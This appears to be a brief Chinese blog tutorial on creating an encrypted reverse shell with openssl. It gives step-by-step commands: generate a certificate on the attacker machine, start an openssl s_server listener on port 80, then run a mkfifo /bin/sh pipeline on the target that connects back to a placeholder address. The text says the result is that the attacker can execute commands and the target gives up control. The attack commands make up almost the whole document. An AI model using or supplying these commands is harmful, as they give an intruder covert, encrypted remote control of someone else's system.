1、攻击机生成证书:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

2、攻击机开启服务
openssl s_server -quiet -key key.pem -cert cert.pem -port 80
3、靶机连接命令
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect X.X.X.X:80 > /tmp/s; rm /tmp/s
4、实现效果
攻击机可进行命令执行

靶机交出控制权

其他反弹shell命令
参见我的其他文章












![[vxe-table] 合并行后滚动错位](https://img-blog.csdnimg.cn/f0313c53766d4c5cba84fb8da6562392.png)






